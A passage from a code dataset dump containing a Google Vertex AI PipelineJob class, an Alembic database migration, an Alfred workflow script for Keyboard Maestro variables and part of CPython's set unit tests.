ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a49ea7fea10b37bd17e2462c089faa410cf524a | # -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import time
import re
from typing import Any, Dict, List, Optional
from google.auth import credentials as auth_credentials
from google.cloud.aiplatform import base
from google.cloud.aiplatform import initializer
from google.cloud.aiplatform import utils
from google.cloud.aiplatform.utils import json_utils
from google.cloud.aiplatform.utils import pipeline_utils
from google.protobuf import json_format
from google.cloud.aiplatform.compat.types import (
pipeline_job_v1beta1 as gca_pipeline_job_v1beta1,
pipeline_state_v1beta1 as gca_pipeline_state_v1beta1,
)
_LOGGER = base.Logger(__name__)
_PIPELINE_COMPLETE_STATES = set(
[
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_SUCCEEDED,
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_FAILED,
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_CANCELLED,
gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_PAUSED,
]
)
_PIPELINE_ERROR_STATES = set(
[gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_FAILED]
)
# Pattern for valid names used as a Vertex resource name.
_VALID_NAME_PATTERN = re.compile("^[a-z][-a-z0-9]{0,127}$")
def _get_current_time() -> datetime.datetime:
"""Gets the current timestamp."""
return datetime.datetime.now()
def _set_enable_caching_value(
pipeline_spec: Dict[str, Any], enable_caching: bool
) -> None:
"""Sets pipeline tasks caching options.
Args:
pipeline_spec (Dict[str, Any]):
Required. The dictionary of pipeline spec.
enable_caching (bool):
Required. Whether to enable caching.
"""
for component in [pipeline_spec["root"]] + list(
pipeline_spec["components"].values()
):
if "dag" in component:
for task in component["dag"]["tasks"].values():
task["cachingOptions"] = {"enableCache": enable_caching}
class PipelineJob(base.VertexAiResourceNounWithFutureManager):
client_class = utils.PipelineJobClientWithOverride
_is_client_prediction_client = False
_resource_noun = "pipelineJobs"
_delete_method = "delete_pipeline_job"
_getter_method = "get_pipeline_job"
_list_method = "list_pipeline_jobs"
def __init__(
self,
display_name: str,
template_path: str,
job_id: Optional[str] = None,
pipeline_root: Optional[str] = None,
parameter_values: Optional[Dict[str, Any]] = None,
enable_caching: Optional[bool] = None,
encryption_spec_key_name: Optional[str] = None,
labels: Optional[Dict[str, str]] = None,
credentials: Optional[auth_credentials.Credentials] = None,
project: Optional[str] = None,
location: Optional[str] = None,
):
"""Retrieves a PipelineJob resource and instantiates its
representation.
Args:
display_name (str):
Required. The user-defined name of this Pipeline.
template_path (str):
Required. The path of PipelineJob or PipelineSpec JSON file. It
can be a local path or a Google Cloud Storage URI.
Example: "gs://project.name"
job_id (str):
Optional. The unique ID of the job run.
If not specified, pipeline name + timestamp will be used.
pipeline_root (str):
Optional. The root of the pipeline outputs. Default to be staging bucket.
parameter_values (Dict[str, Any]):
Optional. The mapping from runtime parameter names to its values that
control the pipeline run.
enable_caching (bool):
Optional. Whether to turn on caching for the run.
If this is not set, defaults to the compile time settings, which
are True for all tasks by default, while users may specify
different caching options for individual tasks.
If this is set, the setting applies to all tasks in the pipeline.
Overrides the compile time settings.
encryption_spec_key_name (str):
Optional. The Cloud KMS resource identifier of the customer
managed encryption key used to protect the job. Has the
form:
``projects/my-project/locations/my-region/keyRings/my-kr/cryptoKeys/my-key``.
The key needs to be in the same region as where the compute
resource is created.
If this is set, then all
resources created by the BatchPredictionJob will
be encrypted with the provided encryption key.
Overrides encryption_spec_key_name set in aiplatform.init.
labels (Dict[str,str]):
Optional. The user defined metadata to organize PipelineJob.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to create this batch prediction
job. Overrides credentials set in aiplatform.init.
project (str),
Optional. Project to retrieve PipelineJob from. If not set,
project set in aiplatform.init will be used.
location (str),
Optional. Location to create PipelineJob. If not set,
location set in aiplatform.init will be used.
Raises:
ValueError: If job_id or labels have incorrect format.
"""
utils.validate_display_name(display_name)
if labels:
utils.validate_labels(labels)
super().__init__(project=project, location=location, credentials=credentials)
self._parent = initializer.global_config.common_location_path(
project=project, location=location
)
pipeline_json = json_utils.load_json(
template_path, self.project, self.credentials
)
# Pipeline_json can be either PipelineJob or PipelineSpec.
if pipeline_json.get("pipelineSpec") is not None:
pipeline_job = pipeline_json
pipeline_root = (
pipeline_root
or pipeline_job["pipelineSpec"].get("defaultPipelineRoot")
or pipeline_job["runtimeConfig"].get("gcsOutputDirectory")
or initializer.global_config.staging_bucket
)
else:
pipeline_job = {
"pipelineSpec": pipeline_json,
"runtimeConfig": {},
}
pipeline_root = (
pipeline_root
or pipeline_job["pipelineSpec"].get("defaultPipelineRoot")
or initializer.global_config.staging_bucket
)
builder = pipeline_utils.PipelineRuntimeConfigBuilder.from_job_spec_json(
pipeline_job
)
builder.update_pipeline_root(pipeline_root)
builder.update_runtime_parameters(parameter_values)
runtime_config_dict = builder.build()
runtime_config = gca_pipeline_job_v1beta1.PipelineJob.RuntimeConfig()._pb
json_format.ParseDict(runtime_config_dict, runtime_config)
pipeline_name = pipeline_job["pipelineSpec"]["pipelineInfo"]["name"]
self.job_id = job_id or "{pipeline_name}-{timestamp}".format(
pipeline_name=re.sub("[^-0-9a-z]+", "-", pipeline_name.lower())
.lstrip("-")
.rstrip("-"),
timestamp=_get_current_time().strftime("%Y%m%d%H%M%S"),
)
if not _VALID_NAME_PATTERN.match(self.job_id):
raise ValueError(
"Generated job ID: {} is illegal as a Vertex pipelines job ID. "
"Expecting an ID following the regex pattern "
'"[a-z][-a-z0-9]{{0,127}}"'.format(job_id)
)
if enable_caching is not None:
_set_enable_caching_value(pipeline_job["pipelineSpec"], enable_caching)
self._gca_resource = gca_pipeline_job_v1beta1.PipelineJob(
display_name=display_name,
pipeline_spec=pipeline_job["pipelineSpec"],
labels=labels,
runtime_config=runtime_config,
encryption_spec=initializer.global_config.get_encryption_spec(
encryption_spec_key_name=encryption_spec_key_name
),
)
@base.optional_sync()
def run(
self,
service_account: Optional[str] = None,
network: Optional[str] = None,
sync: Optional[bool] = True,
) -> None:
"""Run this configured PipelineJob and monitor the job until completion.
Args:
service_account (str):
Optional. Specifies the service account for workload run-as account.
Users submitting jobs must have act-as permission on this run-as account.
network (str):
Optional. The full name of the Compute Engine network to which the job
should be peered. For example, projects/12345/global/networks/myVPC.
Private services access must already be configured for the network.
If left unspecified, the job is not peered with any network.
sync (bool):
Optional. Whether to execute this method synchronously. If False, this method will unblock and it will be executed in a concurrent Future.
"""
self.submit(service_account=service_account, network=network)
self._block_until_complete()
def submit(
self, service_account: Optional[str] = None, network: Optional[str] = None,
) -> None:
"""Run this configured PipelineJob.
Args:
service_account (str):
Optional. Specifies the service account for workload run-as account.
Users submitting jobs must have act-as permission on this run-as account.
network (str):
Optional. The full name of the Compute Engine network to which the job
should be peered. For example, projects/12345/global/networks/myVPC.
Private services access must already be configured for the network.
If left unspecified, the job is not peered with any network.
"""
if service_account:
self._gca_resource.service_account = service_account
if network:
self._gca_resource.network = network
_LOGGER.log_create_with_lro(self.__class__)
self._gca_resource = self.api_client.create_pipeline_job(
parent=self._parent,
pipeline_job=self._gca_resource,
pipeline_job_id=self.job_id,
)
_LOGGER.log_create_complete_with_getter(
self.__class__, self._gca_resource, "pipeline_job"
)
_LOGGER.info("View Pipeline Job:\n%s" % self._dashboard_uri())
def wait(self):
"""Wait for thie PipelineJob to complete."""
if self._latest_future is None:
self._block_until_complete()
else:
super().wait()
@property
def pipeline_spec(self):
return self._gca_resource.pipeline_spec
@property
def state(self) -> Optional[gca_pipeline_state_v1beta1.PipelineState]:
"""Current pipeline state."""
self._sync_gca_resource()
return self._gca_resource.state
@property
def has_failed(self) -> bool:
"""Returns True if pipeline has failed.
False otherwise.
"""
return (
self.state == gca_pipeline_state_v1beta1.PipelineState.PIPELINE_STATE_FAILED
)
def _dashboard_uri(self) -> str:
"""Helper method to compose the dashboard uri where pipeline can be
viewed."""
fields = utils.extract_fields_from_resource_name(self.resource_name)
url = f"https://console.cloud.google.com/vertex-ai/locations/{fields.location}/pipelines/runs/{fields.id}?project={fields.project}"
return url
def _block_until_complete(self):
"""Helper method to block and check on job until complete."""
# Used these numbers so failures surface fast
wait = 5 # start at five seconds
log_wait = 5
max_wait = 60 * 5 # 5 minute wait
multiplier = 2 # scale wait by 2 every iteration
previous_time = time.time()
while self.state not in _PIPELINE_COMPLETE_STATES:
current_time = time.time()
if current_time - previous_time >= log_wait:
_LOGGER.info(
"%s %s current state:\n%s"
% (
self.__class__.__name__,
self._gca_resource.name,
self._gca_resource.state,
)
)
log_wait = min(log_wait * multiplier, max_wait)
previous_time = current_time
time.sleep(wait)
# Error is only populated when the job state is
# JOB_STATE_FAILED or JOB_STATE_CANCELLED.
if self._gca_resource.state in _PIPELINE_ERROR_STATES:
raise RuntimeError("Job failed with:\n%s" % self._gca_resource.error)
else:
_LOGGER.log_action_completed_against_resource("run", "completed", self)
@classmethod
def get(
cls,
resource_name: str,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
) -> "PipelineJob":
"""Get a Vertex AI Pipeline Job for the given resource_name.
Args:
resource_name (str):
Required. A fully-qualified resource name or ID.
project (str):
Optional. Project to retrieve dataset from. If not set, project
set in aiplatform.init will be used.
location (str):
Optional. Location to retrieve dataset from. If not set,
location set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to upload this model.
Overrides credentials set in aiplatform.init.
Returns:
A Vertex AI PipelineJob.
"""
self = cls._empty_constructor(
project=project,
location=location,
credentials=credentials,
resource_name=resource_name,
)
self._gca_resource = self._get_gca_resource(resource_name=resource_name)
return self
def cancel(self) -> None:
"""Starts asynchronous cancellation on the PipelineJob. The server
makes a best effort to cancel the job, but success is not guaranteed.
On successful cancellation, the PipelineJob is not deleted; instead it
becomes a job with state set to `CANCELLED`.
"""
self.api_client.cancel_pipeline_job(name=self.resource_name)
@classmethod
def list(
cls,
filter: Optional[str] = None,
order_by: Optional[str] = None,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
) -> List["PipelineJob"]:
"""List all instances of this PipelineJob resource.
Example Usage:
aiplatform.PipelineJob.list(
filter='display_name="experiment_a27"',
order_by='create_time desc'
)
Args:
filter (str):
Optional. An expression for filtering the results of the request.
For field names both snake_case and camelCase are supported.
order_by (str):
Optional. A comma-separated list of fields to order by, sorted in
ascending order. Use "desc" after a field name for descending.
Supported fields: `display_name`, `create_time`, `update_time`
project (str):
Optional. Project to retrieve list from. If not set, project
set in aiplatform.init will be used.
location (str):
Optional. Location to retrieve list from. If not set, location
set in aiplatform.init will be used.
credentials (auth_credentials.Credentials):
Optional. Custom credentials to use to retrieve list. Overrides
credentials set in aiplatform.init.
Returns:
List[PipelineJob] - A list of PipelineJob resource objects
"""
return cls._list_with_local_order(
filter=filter,
order_by=order_by,
project=project,
location=location,
credentials=credentials,
)
def wait_for_resource_creation(self) -> None:
"""Waits until resource has been created."""
self._wait_for_resource_creation()
|
py | 1a49ea86ffae726380eb4ac0ca3ef832c01ae2f1 | """initial
Revision ID: ca4351944ed4
Revises:
Create Date: 2018-12-16 17:28:04.537922
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ca4351944ed4'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('info_category',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=64), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('info_user',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('nick_name', sa.String(length=32), nullable=False),
sa.Column('password_hash', sa.String(length=128), nullable=False),
sa.Column('mobile', sa.String(length=11), nullable=False),
sa.Column('avatar_url', sa.String(length=256), nullable=True),
sa.Column('last_login', sa.DateTime(), nullable=True),
sa.Column('is_admin', sa.Boolean(), nullable=True),
sa.Column('signature', sa.String(length=512), nullable=True),
sa.Column('gender', sa.Enum('MAN', 'WOMAN'), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('mobile'),
sa.UniqueConstraint('nick_name')
)
op.create_table('info_news',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title', sa.String(length=256), nullable=False),
sa.Column('source', sa.String(length=64), nullable=False),
sa.Column('digest', sa.String(length=512), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('clicks', sa.Integer(), nullable=True),
sa.Column('comments_count', sa.Integer(), nullable=True),
sa.Column('index_image_url', sa.String(length=256), nullable=True),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('status', sa.Integer(), nullable=True),
sa.Column('reason', sa.String(length=256), nullable=True),
sa.ForeignKeyConstraint(['category_id'], ['info_category.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('info_user_fans',
sa.Column('follower_id', sa.Integer(), nullable=False),
sa.Column('followed_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['followed_id'], ['info_user.id'], ),
sa.ForeignKeyConstraint(['follower_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('follower_id', 'followed_id')
)
op.create_table('info_comment',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('news_id', sa.Integer(), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('like_count', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['news_id'], ['info_news.id'], ),
sa.ForeignKeyConstraint(['parent_id'], ['info_comment.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('info_user_collection',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('news_id', sa.Integer(), nullable=False),
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(['news_id'], ['info_news.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'news_id')
)
op.create_table('info_comment_like',
sa.Column('create_time', sa.DateTime(), nullable=True),
sa.Column('update_time', sa.DateTime(), nullable=True),
sa.Column('comment_id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['comment_id'], ['info_comment.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['info_user.id'], ),
sa.PrimaryKeyConstraint('comment_id', 'user_id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('info_comment_like')
op.drop_table('info_user_collection')
op.drop_table('info_comment')
op.drop_table('info_user_fans')
op.drop_table('info_news')
op.drop_table('info_user')
op.drop_table('info_category')
# ### end Alembic commands ###
|
py | 1a49eb33533c9be3b8c7176feff0f77d72f9d56a | #!/usr/bin/python
# encoding: utf-8
from __future__ import unicode_literals
import os
import argparse
import plistlib
import sys
import sqlite3
from sqlite3 import Error
from workflow import Workflow3, ICON_INFO, ICON_WARNING, ICON_ERROR
KM_APP_SUPPORT = os.path.expanduser("~/Library/Application Support/Keyboard Maestro/")
KM_APP_RESOURCES = "/System/Volumes/Data/Applications/Keyboard Maestro.app/Contents/Resources/"
VARS_DB = KM_APP_SUPPORT + "Keyboard Maestro Variables.sqlite"
CLIPS_PLIST = KM_APP_SUPPORT + "Keyboard Maestro Clipboards.plist"
ICON_KM_VAR = KM_APP_RESOURCES + "Variable.icns"
ICON_KM_CLIP = KM_APP_RESOURCES + "ClipboardIcon.icns"
wf = None
log = None
# noinspection PyProtectedMember
def main(wf):
parser = argparse.ArgumentParser()
parser.add_argument('-v', dest='vars', action='store_true')
parser.add_argument('-c', dest='clips', action='store_true')
parser.add_argument('query', nargs='?', default=None)
args = parser.parse_args(wf.args)
if args.vars:
sql = "SELECT name, value FROM variables WHERE value IS NOT '%Delete%';"
# create a database connection
conn = create_connection(VARS_DB)
with conn:
log.info("query: " + sql)
cur = conn.cursor()
cur.execute(sql)
rows = cur.fetchall()
for row in rows:
name = row[0]
value = row[1]
if len(value) < 100:
sub = value
else:
sub = 'press ↩︎ to view in window'
it = wf.add_item(uid=value,
title=name,
subtitle=sub,
arg=[name,value],
autocomplete=name,
valid=True,
icon=ICON_KM_VAR,
icontype="filepath",
quicklookurl=value)
it.add_modifier('cmd', subtitle="delete '" + name + "'", arg=[name,value], valid=True)
elif args.clips:
clips_pl = plistlib.readPlist(CLIPS_PLIST)
for clip in clips_pl:
name = clip['Name']
uid = clip['UID']
it = wf.add_item(uid=uid,
title=name,
subtitle='press ↩︎ to view',
arg=[name, uid],
autocomplete=name,
valid=True,
icon=ICON_KM_CLIP,
icontype="filepath",
quicklookurl=ICON_KM_CLIP)
if len(wf._items) == 0:
wf.add_item('No items found', icon=ICON_WARNING)
wf.send_feedback()
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by the db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
except Error as e:
print(e)
return conn
if __name__ == '__main__':
wf = Workflow3()
log = wf.logger
sys.exit(wf.run(main))
|
py | 1a49edf23110ab02e76014afeda238205f75dd34 | import unittest
from test import support
import gc
import weakref
import operator
import copy
import pickle
from random import randrange, shuffle
import sys
import warnings
import collections
import collections.abc
class PassThru(Exception):
pass
def check_pass_thru():
raise PassThru
yield 1
class BadCmp:
def __hash__(self):
return 1
def __eq__(self, other):
raise RuntimeError
class ReprWrapper:
'Used to test self-referential repr() calls'
def __repr__(self):
return repr(self.value)
class HashCountingInt(int):
'int-like object that counts the number of times __hash__ is called'
def __init__(self, *args):
self.hash_count = 0
def __hash__(self):
self.hash_count += 1
return int.__hash__(self)
class TestJointOps:
# Tests common to both set and frozenset
def setUp(self):
self.word = word = 'simsalabim'
self.otherword = 'madagascar'
self.letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
self.s = self.thetype(word)
self.d = dict.fromkeys(word)
def test_new_or_init(self):
self.assertRaises(TypeError, self.thetype, [], 2)
self.assertRaises(TypeError, set().__init__, a=1)
def test_uniquification(self):
actual = sorted(self.s)
expected = sorted(self.d)
self.assertEqual(actual, expected)
self.assertRaises(PassThru, self.thetype, check_pass_thru())
self.assertRaises(TypeError, self.thetype, [[]])
def test_len(self):
self.assertEqual(len(self.s), len(self.d))
def test_contains(self):
for c in self.letters:
self.assertEqual(c in self.s, c in self.d)
self.assertRaises(TypeError, self.s.__contains__, [[]])
s = self.thetype([frozenset(self.letters)])
self.assertIn(self.thetype(self.letters), s)
def test_union(self):
u = self.s.union(self.otherword)
for c in self.letters:
self.assertEqual(c in u, c in self.d or c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(u), self.basetype)
self.assertRaises(PassThru, self.s.union, check_pass_thru())
self.assertRaises(TypeError, self.s.union, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').union(C('cdc')), set('abcd'))
self.assertEqual(self.thetype('abcba').union(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').union(C('ccb')), set('abc'))
self.assertEqual(self.thetype('abcba').union(C('ef')), set('abcef'))
self.assertEqual(self.thetype('abcba').union(C('ef'), C('fg')), set('abcefg'))
# Issue #6573
x = self.thetype()
self.assertEqual(x.union(set([1]), x, set([2])), self.thetype([1, 2]))
def test_or(self):
i = self.s.union(self.otherword)
self.assertEqual(self.s | set(self.otherword), i)
self.assertEqual(self.s | frozenset(self.otherword), i)
try:
self.s | self.otherword
except TypeError:
pass
else:
self.fail("s|t did not screen-out general iterables")
def test_intersection(self):
i = self.s.intersection(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.intersection, check_pass_thru())
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').intersection(C('cdc')), set('cc'))
self.assertEqual(self.thetype('abcba').intersection(C('efgfe')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('ccb')), set('bc'))
self.assertEqual(self.thetype('abcba').intersection(C('ef')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('cbcf'), C('bag')), set('b'))
s = self.thetype('abcba')
z = s.intersection()
if self.thetype == frozenset():
self.assertEqual(id(s), id(z))
else:
self.assertNotEqual(id(s), id(z))
def test_isdisjoint(self):
def f(s1, s2):
'Pure python equivalent of isdisjoint()'
return not set(s1).intersection(s2)
for larg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
s1 = self.thetype(larg)
for rarg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s2 = C(rarg)
actual = s1.isdisjoint(s2)
expected = f(s1, s2)
self.assertEqual(actual, expected)
self.assertTrue(actual is True or actual is False)
def test_and(self):
i = self.s.intersection(self.otherword)
self.assertEqual(self.s & set(self.otherword), i)
self.assertEqual(self.s & frozenset(self.otherword), i)
try:
self.s & self.otherword
except TypeError:
pass
else:
self.fail("s&t did not screen-out general iterables")
def test_difference(self):
i = self.s.difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c not in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.difference, check_pass_thru())
self.assertRaises(TypeError, self.s.difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').difference(C('cdc')), set('ab'))
self.assertEqual(self.thetype('abcba').difference(C('efgfe')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').difference(C('ef')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('a'), C('b')), set('c'))
def test_sub(self):
i = self.s.difference(self.otherword)
self.assertEqual(self.s - set(self.otherword), i)
self.assertEqual(self.s - frozenset(self.otherword), i)
try:
self.s - self.otherword
except TypeError:
pass
else:
self.fail("s-t did not screen-out general iterables")
def test_symmetric_difference(self):
i = self.s.symmetric_difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, (c in self.d) ^ (c in self.otherword))
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.symmetric_difference, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').symmetric_difference(C('cdc')), set('abd'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ef')), set('abcef'))
def test_xor(self):
i = self.s.symmetric_difference(self.otherword)
self.assertEqual(self.s ^ set(self.otherword), i)
self.assertEqual(self.s ^ frozenset(self.otherword), i)
try:
self.s ^ self.otherword
except TypeError:
pass
else:
self.fail("s^t did not screen-out general iterables")
def test_equality(self):
self.assertEqual(self.s, set(self.word))
self.assertEqual(self.s, frozenset(self.word))
self.assertEqual(self.s == self.word, False)
self.assertNotEqual(self.s, set(self.otherword))
self.assertNotEqual(self.s, frozenset(self.otherword))
self.assertEqual(self.s != self.word, True)
def test_setOfFrozensets(self):
t = map(frozenset, ['abcdef', 'bcd', 'bdcb', 'fed', 'fedccba'])
s = self.thetype(t)
self.assertEqual(len(s), 3)
def test_sub_and_super(self):
p, q, r = map(self.thetype, ['ab', 'abcde', 'def'])
self.assertTrue(p < q)
self.assertTrue(p <= q)
self.assertTrue(q <= q)
self.assertTrue(q > p)
self.assertTrue(q >= p)
self.assertFalse(q < r)
self.assertFalse(q <= r)
self.assertFalse(q > r)
self.assertFalse(q >= r)
self.assertTrue(set('a').issubset('abc'))
self.assertTrue(set('abc').issuperset('a'))
self.assertFalse(set('a').issubset('cbs'))
self.assertFalse(set('cbs').issuperset('a'))
def test_pickling(self):
for i in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s, dup, "%s != %s" % (self.s, dup))
if type(self.s) not in (set, frozenset):
self.s.x = 10
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s.x, dup.x)
def test_iterator_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
itorg = iter(self.s)
data = self.thetype(self.s)
d = pickle.dumps(itorg, proto)
it = pickle.loads(d)
# Set iterators unpickle as list iterators due to the
# undefined order of set items.
# self.assertEqual(type(itorg), type(it))
self.assertIsInstance(it, collections.abc.Iterator)
self.assertEqual(self.thetype(it), data)
it = pickle.loads(d)
try:
drop = next(it)
except StopIteration:
continue
d = pickle.dumps(it, proto)
it = pickle.loads(d)
self.assertEqual(self.thetype(it), data - self.thetype((drop,)))
def test_deepcopy(self):
class Tracer:
def __init__(self, value):
self.value = value
def __hash__(self):
return self.value
def __deepcopy__(self, memo=None):
return Tracer(self.value + 1)
t = Tracer(10)
s = self.thetype([t])
dup = copy.deepcopy(s)
self.assertNotEqual(id(s), id(dup))
for elem in dup:
newt = elem
self.assertNotEqual(id(t), id(newt))
self.assertEqual(t.value + 1, newt.value)
def test_gc(self):
# Create a nest of cycles to exercise overall ref count check
class A:
pass
s = set(A() for i in range(1000))
for elem in s:
elem.cycle = s
elem.sub = elem
elem.set = set([elem])
def test_subclass_with_custom_hash(self):
# Bug #1257731
class H(self.thetype):
def __hash__(self):
return int(id(self) & 0x7fffffff)
s=H()
f=set()
f.add(s)
self.assertIn(s, f)
f.remove(s)
f.add(s)
f.discard(s)
def test_badcmp(self):
s = self.thetype([BadCmp()])
# Detect comparison errors during insertion and lookup
self.assertRaises(RuntimeError, self.thetype, [BadCmp(), BadCmp()])
self.assertRaises(RuntimeError, s.__contains__, BadCmp())
# Detect errors during mutating operations
if hasattr(s, 'add'):
self.assertRaises(RuntimeError, s.add, BadCmp())
self.assertRaises(RuntimeError, s.discard, BadCmp())
self.assertRaises(RuntimeError, s.remove, BadCmp())
def test_cyclical_repr(self):
w = ReprWrapper()
s = self.thetype([w])
w.value = s
if self.thetype == set:
self.assertEqual(repr(s), '{set(...)}')
else:
name = repr(s).partition('(')[0] # strip class name
self.assertEqual(repr(s), '%s({%s(...)})' % (name, name))
def test_cyclical_print(self):
w = ReprWrapper()
s = self.thetype([w])
w.value = s
fo = open(support.TESTFN, "w")
try:
fo.write(str(s))
fo.close()
fo = open(support.TESTFN, "r")
self.assertEqual(fo.read(), repr(s))
finally:
fo.close()
support.unlink(support.TESTFN)
def test_do_not_rehash_dict_keys(self):
n = 10
d = dict.fromkeys(map(HashCountingInt, range(n)))
self.assertEqual(sum(elem.hash_count for elem in d), n)
s = self.thetype(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
s.difference(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
if hasattr(s, 'symmetric_difference_update'):
s.symmetric_difference_update(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
d2 = dict.fromkeys(set(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d), 123)
self.assertEqual(sum(elem.hash_count for elem in d), n)
self.assertEqual(d3, dict.fromkeys(d, 123))
def test_container_iterator(self):
# Bug #3680: tp_traverse was not implemented for set iterator object
class C(object):
pass
obj = C()
ref = weakref.ref(obj)
container = set([obj, 1])
obj.x = iter(container)
del obj, container
gc.collect()
self.assertTrue(ref() is None, "Cycle was not collected")
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, self.thetype)
class TestSet(TestJointOps, unittest.TestCase):
thetype = set
basetype = set
def test_init(self):
s = self.thetype()
s.__init__(self.word)
self.assertEqual(s, set(self.word))
s.__init__(self.otherword)
self.assertEqual(s, set(self.otherword))
self.assertRaises(TypeError, s.__init__, s, 2);
self.assertRaises(TypeError, s.__init__, 1);
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_set_literal(self):
s = set([1,2,3])
t = {1,2,3}
self.assertEqual(s, t)
def test_hash(self):
self.assertRaises(TypeError, hash, self.s)
def test_clear(self):
self.s.clear()
self.assertEqual(self.s, set())
self.assertEqual(len(self.s), 0)
def test_copy(self):
dup = self.s.copy()
